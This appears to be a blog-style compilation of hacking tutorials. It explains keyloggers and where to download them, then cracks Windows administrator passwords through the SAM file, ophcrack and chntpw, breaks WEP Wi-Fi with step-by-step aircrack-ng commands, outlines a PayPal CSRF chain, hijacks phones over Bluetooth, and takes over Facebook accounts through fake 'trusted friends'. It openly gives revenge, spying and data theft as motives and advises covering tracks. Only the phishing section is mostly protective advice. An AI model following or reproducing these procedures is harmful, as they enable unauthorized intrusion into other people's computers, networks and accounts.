Keylogger

Keylogger is a software program or hardware device that is used to monitor and log each of the keys a user types into a computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user. Because these programs and hardware devices monitor the keys typed in a user can easily find user passwords and other information a user may not wish others to know about.
Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted to an unknown third party.


 About keyloggers

key loggersA keylogger is a program that runs in the background, recording all the keystrokes. Once keystrokes are logged, they are hidden in the machine for later retrieval, or shipped raw to the attacker. The attacker then peruses them carefully in the hopes of either finding passwords, or possibly other useful information that could be used to compromise the system or be used in a social engineering attack. For example, a keylogger will reveal the contents of all e-mail composed by the user. Keylogger is commonly included in rootkits.

A keylogger normally consists of two files: a DLL which does all the work and an EXE which loads the DLL and sets the hook. Therefore when you deploy the hooker on a system, two such files must be present in the same directory.

There are other approaches to capturing info about what you are doing.

    * Some keyloggers capture screens, rather than keystrokes.
    * Other keyloggers will secretly turn on video or audio recorders, and transmit what they capture over your internet connection.

A keyloggers might be as simple as an exe and a dll that are placed on a machine and invoked at boot via an entry in the registry. Or a keyloggers could be which boasts these features:

    * Stealth: invisible in process list
    * Includes kernel keylogger driver that captures keystrokes even when user is logged off (Windows 2000 / XP)
    * ProBot program files and registry entries are hidden (Windows 2000 / XP)
    * Includes Remote Deployment wizard
    * Active window titles and process names logging
    * Keystroke / password logging
    * Regional keyboard support
    * Keylogging in NT console windows
    * Launched applications list
    * Text snapshots of active applications.
    * Visited Internet URL logger
    * Capture HTTP POST data (including logins/passwords)
    * File and Folder creation/removal logging
    * Mouse activities
    * Workstation user and timestamp recording
    * Log file archiving, separate log files for each user
    * Log file secure encryption
    * Password authentication
    * Invisible operation
    * Native GUI session log presentation
    * Easy log file reports with Instant Viewer 2 Web interface
    * HTML and Text log file export
    * Automatic E-mail log file delivery
    * Easy setup & uninstall wizards
    * Support for Windows (R) 95/98/ME and Windows (R) NT/2000/XP

Tools:
Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited. 

This invisible spy application is designed for 2000, XP, 2003, Vista and Windows 7.

• Security - allows you to protect program settings, Hidden Mode and Log file.

• Application monitoring - keylogger will record the application that was in use that received the keystroke!

• Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!

• Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.

• Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.

• Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.

• It records every keystroke. Captures passwords and all other invisible text.

Other Features:

• Windows 2000/2003/XP/Vista/Windows 7 support

• Monitors multi-user machines

• Automatic startup

• Friendly interface

• Easy to install

 Download Ardamax Keylogger (1.94Mb)

Perfect Keylogger for Windows 98/2000/XP/Vista and Windows 7
The latest, improved and most stealth version of Perfect Keylogger is now available only after purchase. To protect the product from abuse and improve its quality for the registered users, we no longer offer the trial version of the latest builds. The localized versions of Perfect Keyloger and 64-bit version are also available after purchase. The last public version is still available, but keep in mind that it's not the latest and may be flagged by security software.
Download Perfect keylogger

 

Hack Windows Admin

Today, i am going to show you many aspects of the Windows Password Storage path, Method of Encryption, and breaking into Windows by cracking the admin password. We need this often for many reasons:
1) Sometime we have forgotten our old password and Hint isn't helping out.
2) We want to break into someone computer to get the information.
3) Just want to take revenge from someone.
4) Stealing computer data.

Lets, take a deep dive in Cracking Windows password and also where these are stored and in which format.

SAM file and Password Hashes~Place where these passwords are stored in Hashes:
Password Hashes - When you type your password into a Windows NT, 2000, or XP login Windows Seven, Vista etc Windows encrypts your password using a specific encryption scheme that turns your password into something that looks like this:

                    7524248b4d2c9a9eadd3b435c51404eddc5

This is a password Hash. This is what is actually being checked against when you type your password in. It encrypts what you typed and bounces it against what is stored in the Registry and/or SAM File. 
You can break this hash password from
http://adf.ly/1A7mPE
http://adf.ly/1A7mSB

SAM File - Holds the user names and password hashes for every account on the local machine, or domain if it is a domain controller.

Location of SAM/Hashes:
You can find what you're looking for in several locations on a given machine.
It can be found on the hard drive in the folder %systemroot%system32config (i-e C:\windows\system32\config). However this folder is locked to all accounts including Administrator while the machine is running. The only account that can access the SAM file during operation is the "System" account.

The second location of the SAM or corresponding hashes can be found in the registry. It can be found under HKEY_LOCAL_MACHINESAM. This is also locked to all users, including Administrator, while the machine is in use.(GO to Run and Type Regedit and Hit enter, Now scroll to HKEY_LOCAL_MACHINESAM, However you may not access to it.)

So the two (Some other also) locations of the SAMHashes are:
- %systemroot%system32config
- In the registry under HKEY_LOCAL_MACHINESAM

Cracking or Breaking Into Admin Account:
How to get Hashes form SAM file?
Well, Below are the methods to do so:
1) Well, the easiest way to do this is to boot your target machine to an alternate OS like NTFSDOS or Linux and just copy the SAM from the %systemroot%system32config  folder.
It's quick, it's easy, and it's effective. You can get a copy of NTFSDOS from Sysinternals(http://www.sysinternals.com) The regular version of NTFSDOS is freeware, which is always nice, but only allows for Read-Only access. This should be fine for what you want to do, however, if you're the kind of person that just has to have total control and has some money to burn. NTFSDOS Pro, which is also by Sysinternals has read/write access but it'll cost you $299.

2) You can also get password hashes by using pwdump2 (Google It to get software ~ Search at openwall.com). pwdump uses .DLL injection in order to use the system account to view and get the password hashes stored in the registry. It then obtains the hashes from the registry and stores them in a handy little text file that you can then  paste them into a password cracking utility like l0phtcrack or John the ripper (Linux Based works well) also cain and abel can be used. 

3) Import Hashes directly from l0phtcrack, and let them open to you by cracking.


Obtained Hashes? Now crack them:
Well, as i have said that these can't be reversed but somehow automated famous cracking softwares can be used to achieve the target. Yes, it is possible, All we have to do is to have a bit patience. The software will use a lot of strings and will compare these hashes also, Inshort it will decode them.

1) Johnthe Ripper - John the Ripper is to many, the old standby password cracker. It is command line which makes it nice if you're doing some scripting, and best of all it's free and in open source. The only real thing that JtR is lacking is the ability to launch Brute Force attacks against your password file. But look at it this way, even though it is only a dictionary cracker, that will probably be all you need. I would say that in my experience I can find about 85-90% of the passwords in a given file by using just a dictionary attack.

2) L0phtCrack - Probably the most wildly popular password cracker out there. L0phtCrack is sold by the folks at @Stake. And with a pricetag of $249 for a single user license it sure seems like every one owns it. This is probably the nicest password cracker you will ever see. With the ability to import hashes directly from the registry pwdump and dictionary, hybrid, and brute-force capabilities. No password should last long. Well, I shouldn't say "no password". But almost all will fall to L0phtCrack given enough time.

Making Your Own Password in Windows:
Injecting Password Hashes into the SAM:
Easiest ways to gain Administrator privileges on a machine, is by injecting your own password hashes into the SAM file. In order to do this you will need physical access to the machine and a brain larger than a peanut. Using a utility called "chntpw" by Petter Nordhal-Hagen you can inject whatever password you wish into the SAM file of any NT, 2000, or XP machine thereby giving you total control, just burn the .iso on a disk and use it. I would give a tip like backing up the SAM file first by using an alternate OS.Make a USB disk of linux or Windows Live dsik can also work. Go in, inject the password of your choosing. Login using your new password. Do what you need to do. Then restore the original SAM so that no one will know that i was hacked.

You need to have admin access to perform this change from the command line. This is an especially handy trick if you want to change a password on an account but you’ve forgotten the original (going through the Control Panel can require confirmation of the old password).

Now we hack Admin Password To verify the user name, by simply typing net user, I get a list of all the user names on that windows machine. Now, go to the command prompt and enter:

                                                                 cd\
cd windows\system32
net user  

If there are people near you and you don’t want them to see the password you type, enter:
net user *

                                                             E.g. > net user username *
                                                      > Type a password for the user:
                                                      > Confirm the password:

---

Another Easy method, Using  ophcrack to Hack into Admin Account:

Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman's original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.

This is a type of offline cracking, Just grab .iso of ophcrack from here. Burn it and enjoy using.
1.  Opchrack can crack passwords for Windows 7, Windows Vista, and Windows XP.
2. Ophcrack can recover 99.9% of passwords from Windows XP, usually in a matter of seconds. Any  14-character or smaller password that uses any combination of numbers, small letters, and capital letters should be crackable.
3.  Ophcrack can recover 99% of passwords from Windows 7 or Windows Vista. A dictionary attack is used in Windows 7 and Vista.
4.  The Ophcrack LiveCD option allows for completely automatic password recovery.
5.  LiveCD method requires no installation in Windows, making it a safe alternative to many other password recovery tools.
6.  No Windows passwords need to be known to use the Ophcrack LiveCD to crack your Windows passwords.

Download

I think this ophcrack method is far better, Try this one just get a disk and write it, Or else USB disk can aslo be used.

Some security Tips ~ Making strong passwords:
Now, You might have come to know that how passwords can be cracked, So there are some tips for you.
1) Do not make common passwords like 123456 or the one of your own name.
2) Use @, *, # or other symbols in your passwords to ensure maximum security in this case John the ripper and Ophcrack and also other cracking tools may take long time, it will be frustrating for hacker.
3) Keep changing your password. So, that if long time is taken by one hash to decode, until it decodes you have generated another hash.

HACK WIFI BY BACKTRACK

Step 1:-

First Download Backtrack  from the following link:

CLICK HERE TO DOWNLOAD

Step 2:-

Burn the iso image on CD and boot your laptop from CD drive

Step 3:-

Select the third boot option(VESA/KDE).

Step 4:-

Once in BT3, click the tiny black box in the lower left corner to load up a

 "Konsole" window.

Step 5:-

Type the following command

airmon-ng

Note down the interface name. In this example wifi0

Step 6:-

airmon-ng stop wifi0

Step 7:-

ifconfig wifi0 down

Step 8:-

macchanger --mac 00:11:22:33:44:66 wifi0

Step 9:-

airmon-ng start wifi0

Step 10:-

airodump-ng wifi0

This will start populating Wifi networks. Press Ctrl + C to stop.

Check the network with WEP encryption.

Notedown BSSID, CH and ESSID somewhere in notepad or paper

Note that if the same BSSID is available in the second part with STATION associated with it,

means you some one is accessing that network and our task will be little easier.

If not than don’t worry we will still crack it.

Step 11:-

airodump-ng -c (channel) -w (file name)

Replace

(channel) with the CH which u had already n

(file name) with any name of your choice

(bssid) with the BSSID which u had already note

--bssid (bssid) wifi0

Note it

Leave this console as it is and start new konsole

Step 12:-

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0

If you don’t get Association Successful mesage then keep on trying until

you got success.

Step 13:-

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0

Well if you don’t see ARP ACK and sent packets are not increasing or still 0

than it means no 1 is

accessing that network.But don’t worry you go an optional step,

Leave this console as it is and start new k

Step 14:-

aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF

konsole

message than keep on trying until you get success

got an optional step

konsole

–b (bssid) –h 00:11:22:33:44:66 wfi0

Press y and enter

Now you will see that ARP and ACK packets in 2nd console are increasing fast

Keep this console as it is and start 4th console.

Step 15:-

aircrack-ng -b (bssid) (filename)-

Just wait and watch…..Backtrack will do rest of the work.

Hurray we got the key.

Done..!!

 

 

HACK FACEBOOK ACCOUNT THROUGH PHISHING

Here we tells about PHISHING & How can we protect from it.~!

>>WHAT IS PHISHING:-

The act of sending an e-mail to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surroundering private information that will be used for identity theft. The e-mail directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is bogus and set up only to steal the user’s information.

 

>>MOBILE PHISHING:

Phishing scams are not limited to the internet. Some phishers use the telephone to make requests for information. If you get a call from your banking institution asking for personal information, hang up and call your bank directly. Your bank will have your social security number and account information on file and should only ask you to verify a few digits.

like Iphone,Apple ,iTunes n more...By SMS

EXAMPLE:-

>>Congratulations! Your mobile phone has won US$ 10 Million prize money. To claim your money, call this number XXXXXXXX,give your permanent address,pin number,account number or credit card number...

The phisher can ask like it They want your personal Information.

 Some people do the reply to phisher then after he/she can be target of Phisher... so never be reply these type of Messages or Mail.

 

In a phishing attack, the attacker creates a situation wherein people believe that they are dealing with an authorized party, like their bank or another service provider. The attacker will ask the victim for sensitive information such as credit card information.



>>Phishing attacks generally target:

    * Bank information – e.g. VISA and PayPal accounts.
    * Username and password information.
    * Social Security numbers.
    * Information which can be used to retrieve forgotten or lost credentials.

>>Follow the tips below to protect yourself against these threats:

· Your bank will never ask you to divulge account information or passwords via email. Never give out this information, especially via email.

· Don’t open emails that come from untrusted sources.

· Don’t run files that you receive via email without making sure of their origin.

· Don’t click links in emails. If they come from a known source, type them on the browser’s address bar. If they come from an untrusted source, simply ignore them, as they could take you to a web designed to download malware onto your computer.

· Keep your computer protected. Install a security solution and keep it up-to-date.


>>Protect yourself from Phishing scams that could lead to identity theft. I cannot stress this enough. Phishing scams are a hot topic lately that have grown with the popularity of online banking and social networking sites like MySpace, Facebook and Friendster.

The term Phishing comes from the analogy to "fishing". The phisher uses a bait to lure victims into giving out personal information like passwords and credit card numbers. The bait is typically and urgent plea from one of the victims friends or trusted websites, asking for information to resolve some sort of problem with their account.


>>Anti-phishing software is a must for anyone that accesses the internet. Most of the internet service providers have some safety measures included as part of their online security software. Most web browsers also have add-ons that can detect most phishing scams. Unfortunately, these measures are not enough. Some of the more clever phishers have found ways to trick the anti-phishing software so you need to be cautious of suspicious emails and messages.

---

               

        HACK PAYPAL ACCOUNT

1- Reusable CSRF Token:

The CSRF token “that authenticate every single request made by the user” which can be also found in the request body of every request with the parameter name “Auth” get changed with every request made by user for security measures, but after a deep investigation I found out that the CSRF Auth is Reusable for that specific user email address or username, this means If an attacker found any of these CSRF Tokens, He can then make actions in the behave of any logged in user.

Hmm, it seems interesting but still not exploitable, as there is no way for an attacker to get the “Auth” value from a victim session.

2- Bypassing the CSRF Auth System:

The CSRF Auth verifies every single request of that user, So what If an attacker “not logged in” tries to make a “send money” request then PayPal will ask the attacker to provide his email and password, The attacker will provide the “Victim Email” and ANY password, Then he will capture the request, The request will contain a Valid CSRF Auth token Which is Reusable and Can authorise this specific user requests. Upon Further Investigation, We have found out that an Attacker can obtain the CSRF Auth which can be valid for ALL users, by intercepting the POST request from a page that provide an Auth Token before the Logging-in process, check this page for the magical CSRF Auth “https://www.paypal.com/eg/cgi-bin/webscr?cmd=_send-money”. At this point the attacker Can CSRF “almost” any request on behave of this user.

The application generates a valid “Auth” token for a logged-out user!

Through examination of the password change process, he found that an attacker can NOT Change the victim password without answering the Security Questions set by user, Also the user himself can NOT change the security questions without entering the password!

3- ByPassing the Security Questions Change:

The initial process of “setting” security questions is not password protected and is reusable

After further investigation, noticed that the request of setting up the security questions “which is initiated by the user while signing up” is not password-protected, and it can be reused to reset the security questions up without providing the password, hence, Armed with the CSRF Auth, an attacker can CSRF this process too and change the victim’s Security questions.

At this point, An attacker can conduct a targeted CSRF attack against a PayPal users and take a full control over his account Hence, An attacker can CSRF all the requests including but not limited to:

1- Add/Remove/Confirm Email address

2-Add fully privileged users to business account

3- Change Security questions

4- Change Billing/Shipping Address

5- Change Payment methods

6- Change user settings(Notifications/Mobile settings) ………… and more.

To automate the who process, Yasser has coded a Python interactive server to demonstrate how an attacker can exploit this vulnerability in a real-life scenario attack.

     Mobile Bluetooth Hacking

Here is a list of what you can do when you have hacked the other phone. Have Fun! 

• Read Messages. (They are no more personal!)

• Read Contacts. (Check your lover’s phonebook to see what name he/she has saved your name. Hey, please don’t suicide when you see he/she has saved your number as lover no. 9! HeHe)

• Change Profile (Change the other’s profile to silent mode when you are on a date!)

• Play Ringtone even if the phone is silent (Annoy your classmates!)

• Play songs from the hacked phone in the same phone.

• Restart the phone (Show some magic to your friends!)

• Switch off the phone (Ultimate thing that you can do!)

• Restore Factory Settings (Do this to the most organized one and run away quickly!)

• Change Ringing Volume (You have enough experience how to use it. Don’t you?)

  Follow these steps to hack any Bluetooth enabled mobile phone.

  1. Download Super Bluetooth Hack 1.8 and also check that your mobile is in the list of supported handsets from the link provided. After you have downloaded the .jar file, install it in your mobile.

  2. There is no need to install the software in the mobile which you want to hack.

  3. Turn on the Bluetooth of your handset and open the Super Bluetooth Hack Application.

  4. Select the connect option and then Inquiry Devices to search for any of mobile that has its Bluetooth turned on nearby.

  5. Your friend’s Bluetooth must also be turned on to be found. Pairing between the devices is also necessary sometimes.

  6. Once your friend’s phone has been found, try out its functions!

  ---

   

 

Hack Facebook Account

              Hack Facebook Account

Hence we know that there are many techniques for Hack Facebook Account like Phishing Attacks, Keylogging and other Social techniques but today we are going to see how to hack passwords using new feature introduced by Facebook the 3 Trusted Friends Password Recovery Feature in this what happens if you have lost your password and you don’t have any access to your default email address than this feature will handy by sending request to your 3 trusted friends and hence gaining your account password again.
For this technique you need to create 3 fake Facebook account and you need to surely add these as friends into your victims account whose account you are going to hack.

After success full addition of your fake accounts into victims account as friends follow the below steps .:

1. Go to Facebook and click Forgot your Password ?

2. Than you will get something like below just enter the details you know about him enter his Username, email address and full name.

3. After entering everything check it again and click on search.

4. After succeful search for the user Facebook will show some information about how many emails are linked to the account and there is simple option saying
No Longer Access to These click that one.

5. Now it will promote you to enter a new email address on which you will get the password resetting option so enter your email address I suggest you creating a Fake or Temporary email address for safety purpose.

6. Than it will promote you to enter the Security well if you have some security guess about that one than that’s ok but if you don’t know it than simply enter 3 wrong answers and it will take you to the 3 trusted friends recovery page like below.

7. Now just click continue and facebook will ask you to choose 3 trusted friends choose the 3 fake profiles of your which you created and added into the victims account.
8. After selecting 3 accounts facebook will send security codes to these accounts just enter these codes and you will get Password Resetting email from Facebook on the account you created in Step 5

That’s it now you are successful in Hacking Facebook Password with the 3 Trusted Friends Method.